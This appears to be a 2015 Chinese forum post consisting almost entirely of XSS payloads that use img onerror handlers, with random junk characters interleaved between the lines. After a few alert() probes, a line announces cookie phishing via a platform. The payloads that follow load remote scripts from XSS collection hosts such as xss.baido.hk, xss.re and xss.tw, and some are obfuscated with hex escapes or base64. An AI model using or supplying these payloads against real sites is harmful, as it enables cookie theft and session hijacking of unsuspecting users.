<img src='non-exist.jpg'onerror="alert('xss')">7 r" I0 N& Q8 _8 q N$ }
<img src=# onerror=alert(123)>6 ^* t6 t, g0 |$ u
<img src=# onerror=alert(document.cookie)>2 a: c- ^& |7 m1 Z
下面是利用平台钓cookie的4 W% I3 n6 W2 K; o B
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>( z* _/ S2 U, u. b7 f
6 s. }5 g5 J+ k3 F( z) Q; s
- w+ a- m8 L4 O* C9 ~1 X& p# p
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>& h4 P; \2 A; o" g, U
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
/ \2 |5 L- s- @9 u4 l* r u, F, ^4 j“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>) B# Z7 D* ^2 A" A5 G
<img src=1 onerror=jQuery.getScript("//xss.re/974")> h. J: h( z* A9 C; B
<img src="#">
! T9 F* [; T& V- \) X# ^<img src="#">6 |2 R, X7 c! e3 r1 o
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
b7 g" u9 d9 s3 G# }; ~. H<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">6 q5 M: U$ [, P1 t3 ?
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
- Q7 y6 W) c3 W3 B( N8 ^<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)># l# ]; q5 o5 ~2 R- ?/ ?" G$ c
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
) D/ P4 {8 t" i* Q. X1 X<img src=x width="0" height="0"></img>' m. d2 {5 { f# N0 r2 {
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>, @6 U$ q' ?/ O' D
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
- D. O Q4 P' E; M+ i |
发表于 2015-10-18 14:33:54
收藏
支持
反对